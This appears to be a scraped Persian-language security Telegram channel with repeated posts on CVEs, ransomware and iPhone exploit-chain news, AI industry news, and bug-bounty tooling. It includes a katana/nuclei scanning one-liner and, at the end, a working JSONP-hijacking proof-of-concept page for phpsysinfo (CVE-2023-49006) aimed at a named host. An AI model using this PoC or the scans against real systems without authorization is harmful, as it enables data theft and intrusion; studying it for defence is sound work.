🔴CVE
CVE-2023-46693
آسیب پذیری Cross Site Scripting (XSS) در فرم های قبل از 4.0.5 به مهاجمان اجازه می دهد تا کد خودسرانه را از طریق پارامترهای عنوان اجرا کنند.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2023-46693
آسیب پذیری Cross Site Scripting (XSS) در فرم های قبل از 4.0.5 به مهاجمان اجازه می دهد تا کد خودسرانه را از طریق پارامترهای عنوان اجرا کنند.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
⚡1👍1
🔴 CVE
CVE-2023-47324
Silverpeas Core 6.3.1
از طریق ویژگی پیام/اطلاع رسانی در برابر اسکریپت های متقابل سایت (XSS) آسیب پذیر است
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2023-47324
Silverpeas Core 6.3.1
از طریق ویژگی پیام/اطلاع رسانی در برابر اسکریپت های متقابل سایت (XSS) آسیب پذیر است
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Silverpeas
Plateforme collaborative open source Silverpeas votre intranet
Plateforme collaborative open source. Silverpeas vous permet de créer l'outil de collaboration pour votre entreprise.
❤1
برترین زبان های برنامه نویسی برای یادگیری در سال 2023
1. جاوا اسکریپت
- learnjavascript.آنلاین
- learn-js.org
2. جاوا
- learnjavaonline.org
- javatpoint.com
3. C#
- learncs.org
- w3schools.com
4. تایپ اسکریپت
- Typescriptlang.org
- learntypescript.توسعه دهنده
- rust-lang.org
- exercism.org
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
1. جاوا اسکریپت
- learnjavascript.آنلاین
- learn-js.org
2. جاوا
- learnjavaonline.org
- javatpoint.com
3. C#
- learncs.org
- w3schools.com
4. تایپ اسکریپت
- Typescriptlang.org
- learntypescript.توسعه دهنده
- rust-lang.org
- exercism.org
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍3
KASRAONE
Photo
به روز رسانی انتشار Poe
1. اضافه کردن یک پایگاه دانش به ربات
سازندگان Poe اکنون می توانند ربات های خود را از طریق پایگاه دانش بهبود بخشند تا کاربران را با یک تجربه منحصر به فرد و سفارشی تر فراهم کنند.این روش ارتقا یافته می تواند دقت پاسخ ها را بهبود بخشد ، توهمات را کاهش دهد و تجربه تعاملی کاربر را بهبود بخشد.پایگاه دانش می تواند با هر llm پایه (مدل زبان بزرگ) ، از جمله GPT-3.5 ، GPT-4 ، Claude Instant ، Claude 2 یا Llama 2 استفاده شود و برای همه کاربران Poe قابل دسترسی است و می تواند پولدار شود.
2. اضافه شدن مدل تولید تصویر
ما همچنین دو ژنراتور تصویر قدرتمند اضافه کرده ایم: DALL-e-3 و Playground v2.این ربات ها می توانند برای ایجاد تصاویر با کیفیت بالا و خیره کننده بر اساس دستورات ساده استفاده شوند.DALL-e-3 همچنین می تواند به عنوان پایه ای برای ساخت ربات خود و به اشتراک گذاری آن با جهان استفاده شود (توجه: DALL-e-3 فقط برای مشترکین است).
3. گسترش بین المللی
Poe در حال حاضر در 8 زبان جدید (فرانسه ، آلمانی ، ایتالیایی ، کره ای ، پرتغالی ، چینی ساده ، چینی سنتی و اسپانیایی) در دسترس است که تمام سیستم عامل ها را پوشش می دهد.این یک گام مهم در هدف ما است که کاربران بیشتری را در سراسر جهان با توانایی کشف هوش مصنوعی به زبان مادری خود فراهم کنیم.
4. به روز رسانی حریم خصوصی
ما یک آیکون حریم خصوصی جدید را برای کمک به شما در درک بهتر محرمانه بودن مکالمات ربات راه اندازی کرده ایم.اکنون هر رباتی دارای لوگوی privacy shield است که سطح حریم خصوصی چت شما را نشان می دهد: یک نماد کاملا رنگی به این معنی است که سازنده ربات نمی تواند محتوای چت شما را بخواند ، در حالی که یک نماد نیمه رنگی به این معنی است که یک ربات سرور خارجی فقط می تواند به چت ناشناس شما دسترسی پیدا کند history.In در همه موارد ، هویت شما خصوصی خواهد ماند.لطفا در مرکز حریم خصوصی ما بیشتر بدانید.
5. آپدیت اندروید
ما به طور مداوم تجربه اندروید را بهبود می بخشیم و برخی از ویژگی های جدید را اضافه می کنیم ، از جمله توانایی ایجاد و ویرایش ربات ها در حال حاضر.کاربران همچنین می توانند ربات پیش فرض را تنظیم کنند و از دکمه جدید retry برای بازسازی سریع نتایج هر ربات با یک کلیک استفاده کنند.
منبع: Poe邮件
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
1. اضافه کردن یک پایگاه دانش به ربات
سازندگان Poe اکنون می توانند ربات های خود را از طریق پایگاه دانش بهبود بخشند تا کاربران را با یک تجربه منحصر به فرد و سفارشی تر فراهم کنند.این روش ارتقا یافته می تواند دقت پاسخ ها را بهبود بخشد ، توهمات را کاهش دهد و تجربه تعاملی کاربر را بهبود بخشد.پایگاه دانش می تواند با هر llm پایه (مدل زبان بزرگ) ، از جمله GPT-3.5 ، GPT-4 ، Claude Instant ، Claude 2 یا Llama 2 استفاده شود و برای همه کاربران Poe قابل دسترسی است و می تواند پولدار شود.
2. اضافه شدن مدل تولید تصویر
ما همچنین دو ژنراتور تصویر قدرتمند اضافه کرده ایم: DALL-e-3 و Playground v2.این ربات ها می توانند برای ایجاد تصاویر با کیفیت بالا و خیره کننده بر اساس دستورات ساده استفاده شوند.DALL-e-3 همچنین می تواند به عنوان پایه ای برای ساخت ربات خود و به اشتراک گذاری آن با جهان استفاده شود (توجه: DALL-e-3 فقط برای مشترکین است).
3. گسترش بین المللی
Poe در حال حاضر در 8 زبان جدید (فرانسه ، آلمانی ، ایتالیایی ، کره ای ، پرتغالی ، چینی ساده ، چینی سنتی و اسپانیایی) در دسترس است که تمام سیستم عامل ها را پوشش می دهد.این یک گام مهم در هدف ما است که کاربران بیشتری را در سراسر جهان با توانایی کشف هوش مصنوعی به زبان مادری خود فراهم کنیم.
4. به روز رسانی حریم خصوصی
ما یک آیکون حریم خصوصی جدید را برای کمک به شما در درک بهتر محرمانه بودن مکالمات ربات راه اندازی کرده ایم.اکنون هر رباتی دارای لوگوی privacy shield است که سطح حریم خصوصی چت شما را نشان می دهد: یک نماد کاملا رنگی به این معنی است که سازنده ربات نمی تواند محتوای چت شما را بخواند ، در حالی که یک نماد نیمه رنگی به این معنی است که یک ربات سرور خارجی فقط می تواند به چت ناشناس شما دسترسی پیدا کند history.In در همه موارد ، هویت شما خصوصی خواهد ماند.لطفا در مرکز حریم خصوصی ما بیشتر بدانید.
5. آپدیت اندروید
ما به طور مداوم تجربه اندروید را بهبود می بخشیم و برخی از ویژگی های جدید را اضافه می کنیم ، از جمله توانایی ایجاد و ویرایش ربات ها در حال حاضر.کاربران همچنین می توانند ربات پیش فرض را تنظیم کنند و از دکمه جدید retry برای بازسازی سریع نتایج هر ربات با یک کلیک استفاده کنند.
منبع: Poe邮件
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
⚡1👍1
همان سیاست اصلی مانع از دیدن جاوا اسکریپت یک وب سایت در نتیجه درخواست انجام شده به یک دامنه دیگر می شود. این ضروری است چون این درخواست هر کوکی ذخیره شده برای آن دامنه را همراه خود می فرستد. اگر شما در سایت دیگر تأیید هویت شوید و از یک سایت مخرب بازدید کنید ، پس صفحه evil می تواند ، مثلا ، خلاصه حساب شما را از سایت دیگر درخواست کند.
ادامه مقاله :
LINK:
Plain text considered harmful: A cross-domain exploit
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
ادامه مقاله :
LINK:
Plain text considered harmful: A cross-domain exploit
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
KASRAONE
Photo
🔴 باج افزاره گربه سیاه
اف بي آي نرم افزار باج گربه سياه رو از کار انداخت و يه ابزار رمزگشايي مجاني رو منتشر کرد
وزارت دادگستری ایالات متحده رسما از تخریب عملیات باج افزار BlackCat خبر داد و یک ابزار رمزگشایی را منتشر کرد که قربانیان می توانند برای دسترسی مجدد به فایل های قفل شده توسط بدافزار استفاده کنند.
اسناد دادگاه نشان می دهد که اداره تحقیقات فدرال ایالات متحده (FBI) یک مخبر انسانی محرمانه (CHS) را به عنوان یک عضو وابسته به BlackCat استخدام کرده و به پنل شبکه ای که برای مدیریت قربانیان باند استفاده می شود دسترسی پیدا کرده است. این یک مورد هک کردن هکرها است.
BlackCat (BlackCat) ، همچنین به عنوان ALPHV و Noberus شناخته می شود ، در ابتدا در دسامبر 2021 ظاهر شد و از آن زمان به دومین نسخه فعال باج افزار به عنوان یک سرویس (باج به عنوان یک سرویس) در جهان تبدیل شده است LockBit.It همچنین اولین نرم افزار باج گیری مبتنی بر زبان زنگ است که در طبیعت کشف شده است.
اف بی آی گفت که با ده ها قربانی در ایالات متحده برای اجرای رویه های رمزگشایی که آنها را از مطالبات باج به مبلغ حدود 68 میلیون دلار آمریکا معاف می کند ، کار کرده است و همچنین بینش شبکه کامپیوتری نرم افزار باج را به دست آورده است ، و آن را قادر می سازد تا 946 جفت کلید عمومی/خصوصی را که برای میزبانی وب سایت TOR که توسط سازمان اداره می شود و از بین بردن آن استفاده می شود ، جمع آوری کند.
LINK
https://thehackernews.com/2023/12/fbi-takes-down-blackcat-ransomware.html?m=1
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
اف بي آي نرم افزار باج گربه سياه رو از کار انداخت و يه ابزار رمزگشايي مجاني رو منتشر کرد
وزارت دادگستری ایالات متحده رسما از تخریب عملیات باج افزار BlackCat خبر داد و یک ابزار رمزگشایی را منتشر کرد که قربانیان می توانند برای دسترسی مجدد به فایل های قفل شده توسط بدافزار استفاده کنند.
اسناد دادگاه نشان می دهد که اداره تحقیقات فدرال ایالات متحده (FBI) یک مخبر انسانی محرمانه (CHS) را به عنوان یک عضو وابسته به BlackCat استخدام کرده و به پنل شبکه ای که برای مدیریت قربانیان باند استفاده می شود دسترسی پیدا کرده است. این یک مورد هک کردن هکرها است.
BlackCat (BlackCat) ، همچنین به عنوان ALPHV و Noberus شناخته می شود ، در ابتدا در دسامبر 2021 ظاهر شد و از آن زمان به دومین نسخه فعال باج افزار به عنوان یک سرویس (باج به عنوان یک سرویس) در جهان تبدیل شده است LockBit.It همچنین اولین نرم افزار باج گیری مبتنی بر زبان زنگ است که در طبیعت کشف شده است.
اف بی آی گفت که با ده ها قربانی در ایالات متحده برای اجرای رویه های رمزگشایی که آنها را از مطالبات باج به مبلغ حدود 68 میلیون دلار آمریکا معاف می کند ، کار کرده است و همچنین بینش شبکه کامپیوتری نرم افزار باج را به دست آورده است ، و آن را قادر می سازد تا 946 جفت کلید عمومی/خصوصی را که برای میزبانی وب سایت TOR که توسط سازمان اداره می شود و از بین بردن آن استفاده می شود ، جمع آوری کند.
LINK
https://thehackernews.com/2023/12/fbi-takes-down-blackcat-ransomware.html?m=1
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
⚡1
🔴 Android Penetration Part 1
MEDIUOM
https://medium.com/p/b82b0d06e360
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
MEDIUOM
https://medium.com/p/b82b0d06e360
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
KASRAONE
Photo
«پیچیدهترین» زنجیره حمله آیفون که تا به حال ایجاد شده است - از چهار آسیبپذیری روز صفر برای ایجاد یک اکسپلویت با کلیک صفر استفاده میکند.
بین سالهای 2019 و دسامبر 2022، یک آسیبپذیری بسیار پیشرفته iMessage ظاهر شد که محققان امنیتی Kaspersky که در نهایت آن را کشف کردند، آن را Operation Triangulation نامیدند. اکنون، آنها آنچه را که درباره «پیچیدهترین زنجیره حملهای که تا به حال دیدهاند» به اشتراک میگذارند.
امروز در کنفرانس ارتباطات آشوب، محققان امنیتی کسپرسکی بوریس لارین، لئونید بزویچنکو و گئورگی کوچرین در مورد "عملیات مثلث" سخنرانی کردند. این اولین باری است که این سه نفر «تمام آسیبپذیریها و جزئیات آسیبپذیری مورد استفاده در حملات پیشرفته iMessage را به صورت عمومی افشا میکنند».
محققان همچنین تمام کارهای خود را امروز در وبلاگ Kaspersky SecureList به اشتراک گذاشتند.
در زیر زنجیره حمله کامل و پیچیده شامل چهار آسیبپذیری روز صفر مورد استفاده برای دسترسی ریشه به دستگاه قربانی است:
• مهاجم یک پیوست iMessage مخرب ارسال می کند، که برنامه بدون نشان دادن هیچ نشانه ای به کاربر، آن را پردازش می کند.
• این پیوست از آسیبپذیری اجرای کد از راه دور فقط برای اپل، CVE-2023-41990 در دستورالعمل فونت ADJUST TrueType سوء استفاده میکند. این دستورالعمل از اوایل دهه نود وجود داشت تا زمانی که یک پچ آن را حذف کرد.
• از برنامه نویسی بازگشتی/پرش گرا و چندین مرحله نوشته شده در زبان پرس و جو NSExpression/NSPredicate برای اجرای یک اکسپلویت افزایش امتیاز نوشته شده در جاوا اسکریپت با وصله محیط کتابخانه JavaScriptCore استفاده می کند.
• این کد اکسپلویت جاوا اسکریپت مبهم شده است تا کاملاً ناخوانا شود و اندازه آن تا حد امکان کاهش یابد. با این وجود، تقریباً شامل 11000 خط کد است که عمدتاً برای تجزیه و دستکاری حافظه JavaScriptCore و هسته است.
• از ویژگی اشکال زدایی DollarVM ($vm) JavaScriptCore استفاده می کند تا توانایی دستکاری حافظه JavaScriptCore و اجرای توابع API بومی را از اسکریپت ها به دست آورد.
• این برنامه برای پشتیبانی از آیفون های قدیمی و جدید طراحی شده است و دارای ویژگی دور زدن کد تأیید هویت اشاره گر (PAC) برای بهره برداری از مدل های اخیر است.
• از آسیب پذیری سرریز اعداد صحیح CVE-2023-32434 در فراخوانی های سیستم نقشه برداری حافظه XNU (mach_make_memory_entry و vm_map) برای دسترسی خواندن/نوشتن به کل حافظه فیزیکی دستگاه در سطح کاربر سوء استفاده می کند.
• از رجیسترهای I/O (MMIO) نگاشت شده حافظه سخت افزاری برای دور زدن لایه حفاظتی صفحه (PPL) استفاده می کند. این مشکل به عنوان CVE-2023-38606 کاهش یافته است.
• پس از اینکه تمام آسیبپذیریها مورد سوء استفاده قرار گرفتند، اکسپلویت جاوا اسکریپت میتواند هر کاری را که میخواهد با دستگاه انجام دهد، از جمله اجرای نرمافزارهای جاسوسی، اما مهاجم تصمیم میگیرد: (الف) فرآیند IMAgent را راهاندازی کند و ابزار مؤثری را تزریق کند که آثار سوء استفاده را بر روی دستگاه پاک کند. بار دستگاه؛ (ب) فرآیند سافاری را در حالت مخفی اجرا می کند و آن را به یک صفحه وب با محتوای مرحله بعدی ارسال می کند.
• یک اسکریپت در صفحه وب وجود دارد که قربانی را احراز هویت می کند و در صورت عبور از چک، مرحله بعدی را دریافت می کند: Safari exploit.
• آسیب پذیری سافاری از CVE-2023-32435 برای اجرای کد پوسته سوء استفاده می کند.
• Shellcode یک اکسپلویت هسته دیگری را در قالب یک فایل شی Mach اجرا کرد. از همان آسیب پذیری ها استفاده می کند: CVE-2023-32434 و CVE-2023-38606. همچنین از نظر اندازه و عملکرد بسیار بزرگ است، اما چیزی شبیه یک اکسپلویت هسته نوشته شده در جاوا اسکریپت نیست. برخی از بخش های مربوط به اکسپلویت فوق برای هر دو مشترک است. با این حال، بسیاری از کد آن نیز به تجزیه و دستکاری حافظه هسته اختصاص دارد. این شامل ابزارهای مختلف پس از بهره برداری است که عمدتاً استفاده نمی شوند.
• این آسیبپذیری امتیازات ریشه را به دست میآورد و به مراحل دیگری که نرمافزارهای جاسوسی بارگیری میشوند ادامه میدهد. در پست قبلی به این مراحل پرداختیم.
LINK
https://9to5mac.com/2023/12/27/most-sophisticated-iphone-attack-chain-ever-seen/
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
بین سالهای 2019 و دسامبر 2022، یک آسیبپذیری بسیار پیشرفته iMessage ظاهر شد که محققان امنیتی Kaspersky که در نهایت آن را کشف کردند، آن را Operation Triangulation نامیدند. اکنون، آنها آنچه را که درباره «پیچیدهترین زنجیره حملهای که تا به حال دیدهاند» به اشتراک میگذارند.
امروز در کنفرانس ارتباطات آشوب، محققان امنیتی کسپرسکی بوریس لارین، لئونید بزویچنکو و گئورگی کوچرین در مورد "عملیات مثلث" سخنرانی کردند. این اولین باری است که این سه نفر «تمام آسیبپذیریها و جزئیات آسیبپذیری مورد استفاده در حملات پیشرفته iMessage را به صورت عمومی افشا میکنند».
محققان همچنین تمام کارهای خود را امروز در وبلاگ Kaspersky SecureList به اشتراک گذاشتند.
در زیر زنجیره حمله کامل و پیچیده شامل چهار آسیبپذیری روز صفر مورد استفاده برای دسترسی ریشه به دستگاه قربانی است:
• مهاجم یک پیوست iMessage مخرب ارسال می کند، که برنامه بدون نشان دادن هیچ نشانه ای به کاربر، آن را پردازش می کند.
• این پیوست از آسیبپذیری اجرای کد از راه دور فقط برای اپل، CVE-2023-41990 در دستورالعمل فونت ADJUST TrueType سوء استفاده میکند. این دستورالعمل از اوایل دهه نود وجود داشت تا زمانی که یک پچ آن را حذف کرد.
• از برنامه نویسی بازگشتی/پرش گرا و چندین مرحله نوشته شده در زبان پرس و جو NSExpression/NSPredicate برای اجرای یک اکسپلویت افزایش امتیاز نوشته شده در جاوا اسکریپت با وصله محیط کتابخانه JavaScriptCore استفاده می کند.
• این کد اکسپلویت جاوا اسکریپت مبهم شده است تا کاملاً ناخوانا شود و اندازه آن تا حد امکان کاهش یابد. با این وجود، تقریباً شامل 11000 خط کد است که عمدتاً برای تجزیه و دستکاری حافظه JavaScriptCore و هسته است.
• از ویژگی اشکال زدایی DollarVM ($vm) JavaScriptCore استفاده می کند تا توانایی دستکاری حافظه JavaScriptCore و اجرای توابع API بومی را از اسکریپت ها به دست آورد.
• این برنامه برای پشتیبانی از آیفون های قدیمی و جدید طراحی شده است و دارای ویژگی دور زدن کد تأیید هویت اشاره گر (PAC) برای بهره برداری از مدل های اخیر است.
• از آسیب پذیری سرریز اعداد صحیح CVE-2023-32434 در فراخوانی های سیستم نقشه برداری حافظه XNU (mach_make_memory_entry و vm_map) برای دسترسی خواندن/نوشتن به کل حافظه فیزیکی دستگاه در سطح کاربر سوء استفاده می کند.
• از رجیسترهای I/O (MMIO) نگاشت شده حافظه سخت افزاری برای دور زدن لایه حفاظتی صفحه (PPL) استفاده می کند. این مشکل به عنوان CVE-2023-38606 کاهش یافته است.
• پس از اینکه تمام آسیبپذیریها مورد سوء استفاده قرار گرفتند، اکسپلویت جاوا اسکریپت میتواند هر کاری را که میخواهد با دستگاه انجام دهد، از جمله اجرای نرمافزارهای جاسوسی، اما مهاجم تصمیم میگیرد: (الف) فرآیند IMAgent را راهاندازی کند و ابزار مؤثری را تزریق کند که آثار سوء استفاده را بر روی دستگاه پاک کند. بار دستگاه؛ (ب) فرآیند سافاری را در حالت مخفی اجرا می کند و آن را به یک صفحه وب با محتوای مرحله بعدی ارسال می کند.
• یک اسکریپت در صفحه وب وجود دارد که قربانی را احراز هویت می کند و در صورت عبور از چک، مرحله بعدی را دریافت می کند: Safari exploit.
• آسیب پذیری سافاری از CVE-2023-32435 برای اجرای کد پوسته سوء استفاده می کند.
• Shellcode یک اکسپلویت هسته دیگری را در قالب یک فایل شی Mach اجرا کرد. از همان آسیب پذیری ها استفاده می کند: CVE-2023-32434 و CVE-2023-38606. همچنین از نظر اندازه و عملکرد بسیار بزرگ است، اما چیزی شبیه یک اکسپلویت هسته نوشته شده در جاوا اسکریپت نیست. برخی از بخش های مربوط به اکسپلویت فوق برای هر دو مشترک است. با این حال، بسیاری از کد آن نیز به تجزیه و دستکاری حافظه هسته اختصاص دارد. این شامل ابزارهای مختلف پس از بهره برداری است که عمدتاً استفاده نمی شوند.
• این آسیبپذیری امتیازات ریشه را به دست میآورد و به مراحل دیگری که نرمافزارهای جاسوسی بارگیری میشوند ادامه میدهد. در پست قبلی به این مراحل پرداختیم.
LINK
https://9to5mac.com/2023/12/27/most-sophisticated-iphone-attack-chain-ever-seen/
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
9to5Mac
'Most sophisticated' iPhone attack chain 'ever seen' used four 0-days to create a 0-click exploit - 9to5Mac
Between 2019 and December 2022, an extremely advanced iMessage vulnerability was in the wild that was eventually named “Operation Triangulation”...
❤2
🔍 نکات Bounty Bug: خزیدن پارامترها با Katana برای بردهای سریع XSS/SQLI!
🚀 وقتی صحبت از شکار کارآمد باگ می شود، خزیدن فعال می تواند بازی را تغییر دهد. یکی از ابزارهایی که من به آن تکیه می کنم کاتانا است که به بازیابی URL ها و پارامترها برای آزمایش کامل در برابر XSS، SQLI، SSTI و موارد دیگر کمک می کند.
👉 در اینجا یک خط یک خطی است که این روند را آغاز می کند:
> katana -u http://domain.com -silent -d 15 -rl 500 -jc -c 20 -kf all -ct 2m -sf qurl -o urls.txt
> urless -i urls.txt -o output.txt
> nuclei -l output.txt -t fuzzing-templates/ -silent
🔑 مرحله بعدی چیست؟ URL هایی را که از خزیدن فعال به دست آورده اید، بردارید، موارد تکراری را با urless حذف کنید و در بررسی های XSS، SQLI و SSTI خود قرار دهید. این استراتژی سطح حمله شما را گسترش میدهد و تشخیص آسیبپذیریها و تضمین آن بردهای سریع را آسانتر میکند.
💡موارد حذفی: استفاده از قابلیتهای کاتانا میتواند به شما کمک کند تا مسائل پنهان را به طور موثر کشف کنید و درآمدهای خود را از مزایای باگ تقویت کنید.
#KASRAONE #Scan
🚀 وقتی صحبت از شکار کارآمد باگ می شود، خزیدن فعال می تواند بازی را تغییر دهد. یکی از ابزارهایی که من به آن تکیه می کنم کاتانا است که به بازیابی URL ها و پارامترها برای آزمایش کامل در برابر XSS، SQLI، SSTI و موارد دیگر کمک می کند.
👉 در اینجا یک خط یک خطی است که این روند را آغاز می کند:
> katana -u http://domain.com -silent -d 15 -rl 500 -jc -c 20 -kf all -ct 2m -sf qurl -o urls.txt
> urless -i urls.txt -o output.txt
> nuclei -l output.txt -t fuzzing-templates/ -silent
🔑 مرحله بعدی چیست؟ URL هایی را که از خزیدن فعال به دست آورده اید، بردارید، موارد تکراری را با urless حذف کنید و در بررسی های XSS، SQLI و SSTI خود قرار دهید. این استراتژی سطح حمله شما را گسترش میدهد و تشخیص آسیبپذیریها و تضمین آن بردهای سریع را آسانتر میکند.
💡موارد حذفی: استفاده از قابلیتهای کاتانا میتواند به شما کمک کند تا مسائل پنهان را به طور موثر کشف کنید و درآمدهای خود را از مزایای باگ تقویت کنید.
#KASRAONE #Scan
⚡3❤2
🔴 Autorize
Link GitHub 🐈
https://github.com/Quitten/Autorize
Autorize
یک تمدید تشخیص اجرای مجوز خودکار برای Burp Suite است. این به زبان پایتون توسط باراک تاویلی ، یک متخصص امنیت برنامه نوشته شده است. Autorize برای کمک به تست کنندگان امنیتی با انجام تست های مجوز خودکار طراحی شده است. با آخرین نسخه در حال حاضر Autorize همچنین تست های احراز هویت خودکار
را انجام می دهد.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Link GitHub 🐈
https://github.com/Quitten/Autorize
Autorize
یک تمدید تشخیص اجرای مجوز خودکار برای Burp Suite است. این به زبان پایتون توسط باراک تاویلی ، یک متخصص امنیت برنامه نوشته شده است. Autorize برای کمک به تست کنندگان امنیتی با انجام تست های مجوز خودکار طراحی شده است. با آخرین نسخه در حال حاضر Autorize همچنین تست های احراز هویت خودکار
را انجام می دهد.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍1
نیویورک تایمز از OpenAI و مایکروسافت به دلیل نقض حق چاپ شکایت کرده است
نیویورک تایمز از OpenAI و مایکروسافت شکایت کرده و میگوید این شرکتها اکنون با «کپی کردن و استفاده از میلیونها مقاله» از مقالههای این نشریه برای ساخت مدلهای هوش مصنوعی خود، به طور مستقیم با محتوای نشریه رقابت میکنند. و خواستار این شدند که آنها در قبال "میلیاردها دلار خسارت قانونی و واقعی" به دلیل کپی برداری ادعایی از آثارشان مسئول باشند.
طبق این شکایت، تایمز ادعا میکند که مدلهای زبان بزرگ OpenAI و مایکروسافت (LLM) که ChatGPT و Copilot را هدایت میکنند، «قادر به تولید خروجی هستند که دقیقاً محتوای تایمز را تکرار میکند، محتوای آن را از نزدیک خلاصه میکند و سبک ارائه آن را تقلید میکند. این سازمان رسانه ای گفت که این امر رابطه تایمز با خوانندگان را "کاهش و آسیب رسانده" و در عین حال آن را از "اشتراک، مجوز، تبلیغات و درآمد وابسته" محروم کرده است.
🔴 ادامه خبر در لینک
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
نیویورک تایمز از OpenAI و مایکروسافت شکایت کرده و میگوید این شرکتها اکنون با «کپی کردن و استفاده از میلیونها مقاله» از مقالههای این نشریه برای ساخت مدلهای هوش مصنوعی خود، به طور مستقیم با محتوای نشریه رقابت میکنند. و خواستار این شدند که آنها در قبال "میلیاردها دلار خسارت قانونی و واقعی" به دلیل کپی برداری ادعایی از آثارشان مسئول باشند.
طبق این شکایت، تایمز ادعا میکند که مدلهای زبان بزرگ OpenAI و مایکروسافت (LLM) که ChatGPT و Copilot را هدایت میکنند، «قادر به تولید خروجی هستند که دقیقاً محتوای تایمز را تکرار میکند، محتوای آن را از نزدیک خلاصه میکند و سبک ارائه آن را تقلید میکند. این سازمان رسانه ای گفت که این امر رابطه تایمز با خوانندگان را "کاهش و آسیب رسانده" و در عین حال آن را از "اشتراک، مجوز، تبلیغات و درآمد وابسته" محروم کرده است.
🔴 ادامه خبر در لینک
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
😁1😍1
KASRAONE
(CSRF) ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲ ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ K1 kasraone
🔴 CVE-2023-49006
آسیب پذیری Cross Site Request Forgery (CSRF) در Phpsysinfo نسخه 3.4.3 به مهاجم از راه دور اجازه می دهد تا اطلاعات حساس را از طریق یک صفحه دستکاری شده در فایل XML.php به دست آورد.
phpsysinfo v3.4.3
دارای آسیب پذیری JSONP است. فایل XML.php دارای آسیب پذیری JSONP hijacking است. هنگامی که کاربر از صفحه ای بازدید می کند که با دقت توسط مهاجم ساخته شده است، داده های JSON به دست می آید و برای مهاجم ارسال می شود.
حالا فرآینده این حمله چطوری است ؟
به سادگی از یک فایل PHP برای ارسال داده های JSON بازیابی شده به سرور خود با استفاده از XMLHttpRequest استفاده می کند.
در اینجا کد HTML برای اثبات فایل مفهومی آمده است:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<script>
function dezsbrxdio(data){ alert(JSON.stringify(data)); }
</script>
<script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
</script>
</body>
</html>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
